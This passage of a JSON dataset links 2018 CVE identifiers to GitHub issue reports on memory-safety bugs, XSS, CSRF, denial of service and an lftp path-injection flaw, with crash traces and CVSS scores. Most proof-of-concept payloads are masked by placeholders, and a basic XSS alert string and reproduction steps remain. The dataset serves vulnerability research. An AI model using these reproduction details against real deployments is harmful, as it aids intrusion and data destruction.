  18784. "impactScore": 2.7,
  18785. "exploitabilityScore": 2.8
  18786. },
  18787. {
  18788. "CVE_ID": "CVE-2018-10685",
  18789. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/95",
  18790. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/95",
  18791. "Repo_new": "ckolivas/lrzip",
  18792. "Issue_Created_At": "2018-05-02T20:28:01Z",
  18793. "description": "use after free in lzma_decompress_buf (src/stream.c). On latest version NUMBERTAG and master branch APITAG of lrzip, there is a heap use after free in lzma_decompress_buf function of (src/stream.c), which could be triggered by the POC below. The issue is similar to issue NUMBERTAG but happens in a different function. Triggering of this issue could be tricky: when running on a high performance server, most likely we fail to reproduce; however, when running lrzip on a desktop with all cpu cores busy, we could reproduce in some cases NUMBERTAG To reproduce this issue, run the command multiple times: PATHTAG t $POC The detailed backtrace is as follows NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG at pc NUMBERTAG f2c2 bp NUMBERTAG fd0d3f NUMBERTAG c NUMBERTAG sp NUMBERTAG fd0d3f NUMBERTAG c NUMBERTAG READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG f2c1 in lzma_decompress_buf PATHTAG NUMBERTAG f2c1 in ucompthread PATHTAG NUMBERTAG fd1cb1da6b9 in start_thread ( PATHTAG NUMBERTAG fd1ca9f NUMBERTAG c in clone ( PATHTAG NUMBERTAG is located NUMBERTAG bytes inside of NUMBERTAG byte region FILETAG",
  18794. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  18795. "severity": "CRITICAL",
  18796. "baseScore": 9.8,
  18797. "impactScore": 5.9,
  18798. "exploitabilityScore": 3.9
  18799. },
  18800. {
  18801. "CVE_ID": "CVE-2018-10686",
  18802. "Issue_Url_old": "https://github.com/serghey-rodin/vesta/issues/1558",
  18803. "Issue_Url_new": "https://github.com/serghey-rodin/vesta/issues/1558",
  18804. "Repo_new": "serghey-rodin/vesta",
  18805. "Issue_Created_At": "2018-05-04T11:04:26Z",
  18806. "description": "Vesta CP NUMBERTAG rXSS to\u00a0RCE. Hi, there is a reflected XSS on FILETAG line NUMBERTAG path. The issue can be used to upload a PHP file, hence gaining RCE. Despite during a \"normal\" file upload FILETAG calls _\"v copy fs file\"_ (line NUMBERTAG and URLTAG controls that the destination path is in /tmp or PATHTAG an attacker could upload an existing file, this way triggering APITAG (line NUMBERTAG and gaining the ability to write wherever PHP can.",
  18807. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  18808. "severity": "MEDIUM",
  18809. "baseScore": 6.1,
  18810. "impactScore": 2.7,
  18811. "exploitabilityScore": 2.8
  18812. },
  18813. {
  18814. "CVE_ID": "CVE-2018-10717",
  18815. "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/3",
  18816. "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/3",
  18817. "Repo_new": "miniupnp/ngiflib",
  18818. "Issue_Created_At": "2018-05-03T14:45:19Z",
  18819. "description": "Security Issue: Buffer / Heap Overflow. MENTIONTAG APITAG There's an buffer overflow found in ngiflib.c in line NUMBERTAG Size of tocopy exceeded the pixels size and when copying into context >frbuff_p.p8 it overflow here. Proof of ASAN output: PATHTAG APITAG PATHTAG GIF NUMBERTAG a NUMBERTAG bits NUMBERTAG couleurs bg NUMBERTAG BLOCK SIGNATURE NUMBERTAG extension (id NUMBERTAG fe) Comment extension APITAG : Multi image GIF NUMBERTAG a created with APITAG Tools : APITAG BLOCK SIGNATURE NUMBERTAG extension (id NUMBERTAG f9) disposal_method NUMBERTAG delay_time NUMBERTAG APITAG BLOCK SIGNATURE NUMBERTAG C ',' img pos NUMBERTAG size NUMBERTAG palbits NUMBERTAG imgbits NUMBERTAG ncolors NUMBERTAG Code clear (free NUMBERTAG npi NUMBERTAG Code clear (free NUMBERTAG npi NUMBERTAG Code clear (free NUMBERTAG npi NUMBERTAG Code clear (free NUMBERTAG npi NUMBERTAG Code clear (free NUMBERTAG npi NUMBERTAG Code clear (free NUMBERTAG npi NUMBERTAG Code clear (free NUMBERTAG npi NUMBERTAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG fe NUMBERTAG at pc NUMBERTAG fc5dfe NUMBERTAG bp NUMBERTAG ffd NUMBERTAG sp NUMBERTAG ffd NUMBERTAG f NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG fe NUMBERTAG thread T NUMBERTAG fc5dfe NUMBERTAG in __asan_memcpy ( PATHTAG NUMBERTAG bb4b in memcpy PATHTAG NUMBERTAG bb4b in APITAG PATHTAG NUMBERTAG bb4b in APITAG PATHTAG NUMBERTAG cc3 in APITAG PATHTAG NUMBERTAG ERRORTAG d5f in APITAG PATHTAG NUMBERTAG fa7 in main PATHTAG NUMBERTAG fc5df NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG fe NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG fc5dfe NUMBERTAG in malloc ( PATHTAG NUMBERTAG b in APITAG PATHTAG SUMMARY: APITAG heap buffer overflow NUMBERTAG asan_memcpy Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9f NUMBERTAG c NUMBERTAG fff9f NUMBERTAG c NUMBERTAG fff9f NUMBERTAG c 
NUMBERTAG fff9fa NUMBERTAG c NUMBERTAG fff9fb NUMBERTAG c NUMBERTAG fff9fc0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9fd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9fe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9ff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffa NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffa NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING Affected code: static void APITAG ngiflib_img i, struct ngiflib_decode_context context, const u8 pixels, u NUMBERTAG n) { u NUMBERTAG tocopy; struct ngiflib_gif p = i >parent; while(n NUMBERTAG tocopy = (context APITAG < n) ? context APITAG : n; if(!i APITAG { ifndef NGIFLIB_INDEXED_ONLY if(p >mode & NGIFLIB_MODE_INDEXED) { endif / NGIFLIB_INDEXED_ONLY / ngiflib_memcpy(context >frbuff_p.p8, pixels, tocopy); // crash happened here pixels += tocopy;",
  18820. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  18821. "severity": "HIGH",
  18822. "baseScore": 8.8,
  18823. "impactScore": 5.9,
  18824. "exploitabilityScore": 2.8
  18825. },
  18826. {
  18827. "CVE_ID": "CVE-2018-10726",
  18828. "Issue_Url_old": "https://github.com/datenstrom/yellow/issues/321",
  18829. "Issue_Url_new": "https://github.com/datenstrom/yellow/issues/321",
  18830. "Repo_new": "datenstrom/yellow",
  18831. "Issue_Created_At": "2018-05-04T08:56:42Z",
  18832. "description": "There is a stored XSS vulnerability. A stored XSS vulnerability was found in Datenstrom Yellow NUMBERTAG When the users open the Edit page webpage, they can inject the XSS code to the system. POC: Inject the XSS payload: APITAG alert(\"xss\") APITAG FILETAG FILETAG",
  18833. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  18834. "severity": "MEDIUM",
  18835. "baseScore": 5.4,
  18836. "impactScore": 2.7,
  18837. "exploitabilityScore": 2.3
  18838. },
  18839. {
  18840. "CVE_ID": "CVE-2018-10727",
  18841. "Issue_Url_old": "https://github.com/Fabrik/fabrik/issues/2033",
  18842. "Issue_Url_new": "https://github.com/fabrik/fabrik/issues/2033",
  18843. "Repo_new": "fabrik/fabrik",
  18844. "Issue_Created_At": "2018-05-04T10:50:54Z",
  18845. "description": "Reflected Cross Site Scripting (XSS) vulnerability in fabrik_referrer. Issue description A reflected Cross Site Scripting (XSS) vulnerability in APITAG hidden input field in fabrik forms allows remote attackers to inject arbitrary scripts via the unsanitized HTTP Referrer header. Example Given a fabrik form URL, for example APITAG that contains an input field such as APITAG , it is possible to reproduce the vulnerability by changing the referrer, for example with APITAG . This may be possible via the following cURL command: APITAG Credits Danilo Cianciulli Paolo Di Notte : Koine Srl",
  18846. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  18847. "severity": "MEDIUM",
  18848. "baseScore": 6.1,
  18849. "impactScore": 2.7,
  18850. "exploitabilityScore": 2.8
  18851. },
  18852. {
  18853. "CVE_ID": "CVE-2018-10753",
  18854. "Issue_Url_old": "https://github.com/leesavide/abcm2ps/issues/16",
  18855. "Issue_Url_new": "https://github.com/lewdlime/abcm2ps/issues/16",
  18856. "Repo_new": "lewdlime/abcm2ps",
  18857. "Issue_Created_At": "2018-04-13T09:40:26Z",
  18858. "description": "stack buffer overflow APITAG in delayed_output(float indent). URLTAG (gdb) set args POC (gdb) r abcm2ps NUMBERTAG File POC POC NUMBERTAG error: Bad character NUMBERTAG d\u00ff&e,d_d&dd\u00aaB NUMBERTAG POC NUMBERTAG error: Bad character NUMBERTAG d\u00ff&e,d_d&dd\u00aaB NUMBERTAG POC NUMBERTAG error: Wrong duration in voice overlay POC NUMBERTAG error: Bad character 'k' POC NUMBERTAG error: Note too much dotted POC NUMBERTAG error: Bad character 'N' POC NUMBERTAG error: Bad character 'N' POC NUMBERTAG error: Wrong duration in voice overlay POC NUMBERTAG error: No note in voice overlay POC NUMBERTAG error: Bad character 'K' POC NUMBERTAG error: Bad character 't' POC NUMBERTAG error: Wrong duration in voice overlay POC NUMBERTAG error: !slide! must be on a note or a rest POC NUMBERTAG warning: Line underfull NUMBERTAG pt of NUMBERTAG pt) Program received signal SIGSEGV, Segmentation fault. __GI_getenv (name NUMBERTAG ffff6a NUMBERTAG b8e \"BC_FATAL_STDERR_\", name APITAG \"LIBC_FATAL_STDERR_\") at APITAG NUMBERTAG getenv.c: No such file or directory. (gdb) bt NUMBERTAG ffff NUMBERTAG c NUMBERTAG d in __GI_getenv (name NUMBERTAG ffff6a NUMBERTAG b8e \"BC_FATAL_STDERR_\", name APITAG \"LIBC_FATAL_STDERR_\") at APITAG NUMBERTAG ffff NUMBERTAG c0f NUMBERTAG in __GI___libc_secure_getenv APITAG \"LIBC_FATAL_STDERR_\") at secure APITAG NUMBERTAG ffff NUMBERTAG fe NUMBERTAG a in __libc_message (do_abort=do_abort APITAG fmt=fmt APITAG \" %s : %s terminated \") at PATHTAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG c in __GI___fortify_fail (msg=<optimized out>, msg APITAG \"stack smashing detected\") at APITAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG in __stack_chk_fail () at APITAG NUMBERTAG f NUMBERTAG in delayed_output (indent=<optimized out>) at APITAG",
  18859. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  18860. "severity": "CRITICAL",
  18861. "baseScore": 9.8,
  18862. "impactScore": 5.9,
  18863. "exploitabilityScore": 3.9
  18864. },
  18865. {
  18866. "CVE_ID": "CVE-2018-10758",
  18867. "Issue_Url_old": "https://github.com/datenstrom/yellow/issues/322",
  18868. "Issue_Url_new": "https://github.com/datenstrom/yellow/issues/322",
  18869. "Repo_new": "datenstrom/yellow",
  18870. "Issue_Created_At": "2018-05-05T02:04:03Z",
  18871. "description": "There is a CSRF vulnerability that can delete the users' articles. When the users login in, open the following one page. POC: APITAG delete users' articles ERRORTAG",
  18872. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  18873. "severity": "MEDIUM",
  18874. "baseScore": 6.5,
  18875. "impactScore": 3.6,
  18876. "exploitabilityScore": 2.8
  18877. },
  18878. {
  18879. "CVE_ID": "CVE-2018-10771",
  18880. "Issue_Url_old": "https://github.com/leesavide/abcm2ps/issues/17",
  18881. "Issue_Url_new": "https://github.com/lewdlime/abcm2ps/issues/17",
  18882. "Repo_new": "lewdlime/abcm2ps",
  18883. "Issue_Created_At": "2018-04-13T13:36:30Z",
  18884. "description": "stack buffer overflow APITAG in get_key(struct SYMBOL s). URLTAG (gdb) set args POC2 (gdb) r Starting program: PATHTAG POC2 APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG abcm2ps NUMBERTAG File POC2 POC NUMBERTAG error: Bad character NUMBERTAG POC NUMBERTAG error: Bad character NUMBERTAG stack smashing detected : PATHTAG terminated Program received signal SIGABRT, Aborted NUMBERTAG ffff NUMBERTAG bc NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG PATHTAG No such file or directory. (gdb) bt NUMBERTAG ffff NUMBERTAG bc NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG ffff NUMBERTAG be NUMBERTAG a in __GI_abort () at APITAG NUMBERTAG ffff NUMBERTAG fe7ea in __libc_message (do_abort=do_abort APITAG fmt=fmt APITAG \" %s : %s terminated \") at PATHTAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG c in __GI___fortify_fail (msg=<optimized out>, msg APITAG \"stack smashing detected\") at APITAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG in __stack_chk_fail () at APITAG NUMBERTAG f NUMBERTAG in get_key (s=s APITAG at APITAG NUMBERTAG c8 in get_info (s=s APITAG at APITAG NUMBERTAG in do_tune () at APITAG NUMBERTAG in abc_eof () at APITAG NUMBERTAG e NUMBERTAG e9 in frontend (s=<optimized out>, s APITAG PATHTAG (C&C NUMBERTAG ZV PATHTAG ftype=ftype APITAG fname=fname APITAG \"POC2\", linenum NUMBERTAG linenum APITAG at APITAG NUMBERTAG b NUMBERTAG d in treat_file (fn=<optimized out>, ext=<optimized out>) at APITAG NUMBERTAG f9 in main (argc NUMBERTAG argv=<optimized out>) at APITAG",
  18885. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  18886. "severity": "CRITICAL",
  18887. "baseScore": 9.8,
  18888. "impactScore": 5.9,
  18889. "exploitabilityScore": 3.9
  18890. },
  18891. {
  18892. "CVE_ID": "CVE-2018-10790",
  18893. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/390",
  18894. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/390",
  18895. "Repo_new": "axiomatic-systems/bento4",
  18896. "Issue_Created_At": "2019-04-26T13:44:32Z",
  18897. "description": "Integer overflow at PATHTAG and buffer overflow at PATHTAG cmd: APITAG poc can download here URLTAG version: master head vuln type: integer and buffer overflow There is an integer overflow at APITAG , which then causes an buffer overflow read bugs at APITAG . ERRORTAG The following is the debug process. Integer overflow: ERRORTAG Buffer overflow crash ERRORTAG",
  18898. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  18899. "severity": "HIGH",
  18900. "baseScore": 7.5,
  18901. "impactScore": 3.6,
  18902. "exploitabilityScore": 3.9
  18903. },
  18904. {
  18905. "CVE_ID": "CVE-2018-10804",
  18906. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1053",
  18907. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1053",
  18908. "Repo_new": "imagemagick/imagemagick",
  18909. "Issue_Created_At": "2018-03-24T16:33:01Z",
  18910. "description": "Memory leak in APITAG . Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description Memory leak in APITAG Steps to Reproduce ERRORTAG System Configuration APITAG version NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: Credit: APITAG of Venustech",
  18911. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  18912. "severity": "MEDIUM",
  18913. "baseScore": 6.5,
  18914. "impactScore": 3.6,
  18915. "exploitabilityScore": 2.8
  18916. },
  18917. {
  18918. "CVE_ID": "CVE-2018-10805",
  18919. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1054",
  18920. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1054",
  18921. "Repo_new": "imagemagick/imagemagick",
  18922. "Issue_Created_At": "2018-03-24T16:33:23Z",
  18923. "description": "Memory leak in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description Memory leak in APITAG Steps to Reproduce ERRORTAG System Configuration APITAG version NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: Credit: APITAG of Venustech",
  18924. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  18925. "severity": "MEDIUM",
  18926. "baseScore": 6.5,
  18927. "impactScore": 3.6,
  18928. "exploitabilityScore": 2.8
  18929. },
  18930. {
  18931. "CVE_ID": "CVE-2018-10806",
  18932. "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/10",
  18933. "Issue_Url_new": "https://github.com/philippe/frogcms/issues/10",
  18934. "Repo_new": "philippe/frogcms",
  18935. "Issue_Created_At": "2018-05-07T02:55:10Z",
  18936. "description": "Frog CMS NUMBERTAG has a reflected Cross Site Scripting Vulnerability. I have found a reflected Cross Site Scripting Vulnerability. log into the system as an administrator role\uff1a URLTAG In the document management office, create new directory test1: Files >test1 APITAG APITAG Modify the directory test1 name\uff0cadding a payload at the directory causes directory errors to trigger cross site scripting\u3002 i think you can see the following picture to konw more. APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  18937. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  18938. "severity": "MEDIUM",
  18939. "baseScore": 5.4,
  18940. "impactScore": 2.7,
  18941. "exploitabilityScore": 2.3
  18942. },
  18943. {
  18944. "CVE_ID": "CVE-2018-10821",
  18945. "Issue_Url_old": "https://github.com/BlackCatDevelopment/BlackCatCMS/issues/384",
  18946. "Issue_Url_new": "https://github.com/blackcatdevelopment/blackcatcms/issues/384",
  18947. "Repo_new": "blackcatdevelopment/blackcatcms",
  18948. "Issue_Created_At": "2018-05-05T18:16:01Z",
  18949. "description": "Cross Site Scripting APITAG XSS) Vulnerability in blackcatcms NUMBERTAG Hi, I found a Cross site Scripting APITAG XSS) in blackcatcms NUMBERTAG Cross Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user\u2019s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. Reflected XSS Attacks Reflected attacks are those where the injected script is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request. Reflected attacks are delivered to victims via another route, such as in an e mail message, or on some other web site. When a user is tricked into clicking on a malicious link, submitting a specially crafted form, or even just browsing to a malicious site, the injected code travels to the vulnerable web site, which reflects the attack back to the user\u2019s browser. The browser then executes the code because it came from a \"trusted\" server. Reflected XSS is also sometimes referred to as Non Persistent or Type II XSS. 
Vulnerability Name: Cross Site Scripting APITAG XSS) Vulnerable URL: URLTAG Steps to Reproduce: Step NUMBERTAG Logged In as a Admin Role Step NUMBERTAG On Search panel with APITAG \"> APITAG Step NUMBERTAG It will store the search content as javascript code and it will execute cross site scripting. Vulnerable field is search panel. FILETAG Additional information >blackcatcms NUMBERTAG DB type and version: APITAG NUMBERTAG APITAG >HTTP server type and version: APITAG",
  18950. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  18951. "severity": "MEDIUM",
  18952. "baseScore": 4.8,
  18953. "impactScore": 2.7,
  18954. "exploitabilityScore": 1.7
  18955. },
  18956. {
  18957. "CVE_ID": "CVE-2018-10827",
  18958. "Issue_Url_old": "https://github.com/litecart/litecart/issues/119",
  18959. "Issue_Url_new": "https://github.com/litecart/litecart/issues/119",
  18960. "Repo_new": "litecart/litecart",
  18961. "Issue_Created_At": "2018-05-06T21:09:47Z",
  18962. "description": "DOS Vulnerability through APITAG Hi, I found a DOS Vulnerability in litecart. If an attacker sends random URL's to APITAG those URLs (if unique) are saved to the file APITAG Unfortunatly this file is fully loaded to RAM if a not existing URL is called. By sending a large number of invalid request to litecart, the file size can be increased infinite. Then every call to litecart, that has an invalid url takes the full available memory and causes a lot of IO. Recommendations The entries should be logged to dababase. An upsert command can be used to create or update the entries in the db. How can you protect your system, until a bugfix is published? E.g. create a cron that empties the not_found.log file. Best Regards mschop",
  18963. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  18964. "severity": "HIGH",
  18965. "baseScore": 7.5,
  18966. "impactScore": 3.6,
  18967. "exploitabilityScore": 3.9
  18968. },
  18969. {
  18970. "CVE_ID": "CVE-2018-10916",
  18971. "Issue_Url_old": "https://github.com/lavv17/lftp/issues/452",
  18972. "Issue_Url_new": "https://github.com/lavv17/lftp/issues/452",
  18973. "Repo_new": "lavv17/lftp",
  18974. "Issue_Created_At": "2018-05-16T14:09:53Z",
  18975. "description": "Exploit in reverse mirror job deletes cwd on source. Warning: This will delete local content on the server you are running the commands from NUMBERTAG Create a directory called APITAG on any FTP server NUMBERTAG Run an lftp reverse mirror command with APITAG towards this server, where APITAG does not exist on the local source NUMBERTAG Watch as lftp deletes the cwd on the sourceserver. If you run the lftp command in APITAG as root , that means the entire server will be wiped. Script to reproduce: ERRORTAG From log: CODETAG Clearly arguments passed to APITAG are not escaped correctly, leaving it open to injection LFTP NUMBERTAG Libraries used: Expat NUMBERTAG APITAG NUMBERTAG idn NUMBERTAG Readline NUMBERTAG zlib NUMBERTAG",
  18976. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  18977. "severity": "MEDIUM",
  18978. "baseScore": 6.5,
  18979. "impactScore": 3.6,
  18980. "exploitabilityScore": 2.8
  18981. },
  18982. {
  18983. "CVE_ID": "CVE-2018-10921",
  18984. "Issue_Url_old": "https://github.com/hisdeedsaredust/ttembed/issues/3",
  18985. "Issue_Url_new": "https://github.com/hisdeedsaredust/ttembed/issues/3",
  18986. "Repo_new": "hisdeedsaredust/ttembed",
  18987. "Issue_Created_At": "2018-08-02T15:39:23Z",
  18988. "description": "CVETAG Failure to Check File Bounds May Lead to Input File Corruption. Certain input files may trigger an integer overflow in ttembed input file processing. This overflow could potentially lead to corruption of the input file due to a lack of checking return codes of fgetc/fputc function calls. ttembed fails to check the return of fgetc for failures which can lead to output file corruption. Note the following: ERRORTAG readbe NUMBERTAG should be checking for EOF. The application fails to verify that reads will succeed via ensuring minimum file lengths. Instead, it blindly reads and fails to check that EOF is not returned. As such, large negative values are returned by readbe NUMBERTAG One obvious case occurs on line NUMBERTAG where fstype is set to the output of readbe NUMBERTAG If no more bytes can be read from the file handle, readbe NUMBERTAG will return NUMBERTAG A fseek on line NUMBERTAG adds NUMBERTAG to NUMBERTAG which wraps around to an fseek of NUMBERTAG which is valid. This later leads to incorrect writes and \"corruption\" of the input file. All usages of fgetc should be checked else file bounds should be verified before fseeks/fgetcs are called. The security implications of this seem rather unimportant as an attacker submitted a corrupted file and the server further corrupting it seems rather obtuse, but perhaps some consumer downstream of ttembed may rely on correct files being output. Nevertheless, ttembed should still terminate early in this case before writing. Reproducer attached. Copy modify.ttf to APITAG run ttembed on APITAG then diff the file and the bak. They will be different. FILETAG This has been assigned CVETAG Thank you!",
  18989. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  18990. "severity": "HIGH",
  18991. "baseScore": 7.5,
  18992. "impactScore": 3.6,
  18993. "exploitabilityScore": 3.9
  18994. },
  18995. {
  18996. "CVE_ID": "CVE-2018-10922",
  18997. "Issue_Url_old": "https://github.com/hisdeedsaredust/ttembed/issues/2",
  18998. "Issue_Url_new": "https://github.com/hisdeedsaredust/ttembed/issues/2",
  18999. "Repo_new": "hisdeedsaredust/ttembed",
  19000. "Issue_Created_At": "2018-08-02T15:19:54Z",
  19001. "description": "CVETAG : Use of Untrusted Length Field May Lead to Denial of Service. Hi, If a large length NUMBERTAG fffffff) is parsed by ttembed, the following loop will run for quite a long time causing a denial of service: APITAG As readbe NUMBERTAG calls fgetc four times, this results in roughly NUMBERTAG calls to fgetc. On my computer, it takes ttembed around NUMBERTAG minutes to finish looping. APITAG Instead of looping forever, the code should fail as soon as readbe NUMBERTAG detects an EOF, else, the program should verify the bounds of the program and bail out when size > actual size of the file. This has been assigned CVETAG . Reproducer attached. FILETAG",
  19002. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19003. "severity": "MEDIUM",
  19004. "baseScore": 5.5,
  19005. "impactScore": 3.6,
  19006. "exploitabilityScore": 1.8
  19007. },
  19008. {
  19009. "CVE_ID": "CVE-2018-10958",
  19010. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/302",
  19011. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/302",
  19012. "Repo_new": "exiv2/exiv2",
  19013. "Issue_Created_At": "2018-05-09T13:38:53Z",
  19014. "description": "SIGABRT in types.cpp APITAG function. APITAG registers ]\u2500\u2500\u2500\u2500 $ra NUMBERTAG rb NUMBERTAG fffffffd NUMBERTAG rc NUMBERTAG ec0fed NUMBERTAG e NUMBERTAG rd NUMBERTAG fffffffd NUMBERTAG rsp NUMBERTAG fffffffd NUMBERTAG rbp NUMBERTAG ffffffea $rsi NUMBERTAG ffffffea $rdi NUMBERTAG rip NUMBERTAG c7 \u2192 APITAG mov rdi, rbp $r NUMBERTAG ffffffffffffe NUMBERTAG r NUMBERTAG ffffffffffffe NUMBERTAG r NUMBERTAG ffffffffffffe2f0 $r NUMBERTAG a $r NUMBERTAG ec NUMBERTAG b NUMBERTAG bcaea NUMBERTAG r NUMBERTAG c $r NUMBERTAG r NUMBERTAG eflags: [carry PARITY adjust ZERO sign trap INTERRUPT direction overflow resume virtual NUMBERTAG identification] $es NUMBERTAG gs NUMBERTAG ds NUMBERTAG ss NUMBERTAG b $fs NUMBERTAG cs NUMBERTAG APITAG stack NUMBERTAG fffffffd NUMBERTAG rsp NUMBERTAG fffffffd NUMBERTAG fffffffd NUMBERTAG fffffffd NUMBERTAG fffffff NUMBERTAG fffffffd NUMBERTAG APITAG mov rdi, QWORD PTR [rb NUMBERTAG fffffffd NUMBERTAG ffffffea NUMBERTAG fffffffd NUMBERTAG a NUMBERTAG c0e3e1fcb NUMBERTAG fffffffd NUMBERTAG ec0fd NUMBERTAG e6d6f NUMBERTAG a4c4d NUMBERTAG fffffffd NUMBERTAG fffffffd NUMBERTAG APITAG code:i NUMBERTAG b0 APITAG lea rsp, [rsp NUMBERTAG b8 APITAG mov QWORD PTR [rb NUMBERTAG bf APITAG mov QWORD PTR [rb NUMBERTAG c7 APITAG mov rdi, rbp NUMBERTAG ca APITAG call NUMBERTAG ac0 APITAG NUMBERTAG cf APITAG mov QWORD PTR [rb NUMBERTAG rbp NUMBERTAG d3 APITAG mov QWORD PTR [rbx], ra NUMBERTAG d6 APITAG add rsp NUMBERTAG da APITAG pop rbx APITAG APITAG NUMBERTAG if (size > size NUMBERTAG APITAG APITAG NUMBERTAG APITAG NUMBERTAG size NUMBERTAG size NUMBERTAG ffffffea NUMBERTAG APITAG = new byte[size NUMBERTAG size_ = size NUMBERTAG std::pair<byte , long> APITAG APITAG threads NUMBERTAG Id NUMBERTAG Name: \"exi NUMBERTAG stopped, reason: SINGLE STEP APITAG trace NUMBERTAG c7 \u2192 Name: APITAG size NUMBERTAG ffffffea NUMBERTAG Name: APITAG \"\", APITAG arr= APITAG NUMBERTAG Name: APITAG MENTIONTAG keysize NUMBERTAG c, 
APITAG NUMBERTAG fe \u2192 Name: APITAG data= MENTIONTAG APITAG NUMBERTAG Name: APITAG NUMBERTAG Name: APITAG NUMBERTAG d NUMBERTAG Name: APITAG APITAG NUMBERTAG d \u2192 Name: main(argc NUMBERTAG arg NUMBERTAG fffffffdf NUMBERTAG fffbe NUMBERTAG Name: APITAG <main(int, char const )>, argc NUMBERTAG arg NUMBERTAG fffffffdf NUMBERTAG init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffdf NUMBERTAG c9 \u2192 Name: APITAG APITAG gef\u27a4 terminate called after throwing an instance of 'std::bad_alloc' APITAG std::bad_alloc Program received signal SIGABRT, Aborted. I find this when I set \u2018ulimit NUMBERTAG G)\u2019. [ URLTAG url",
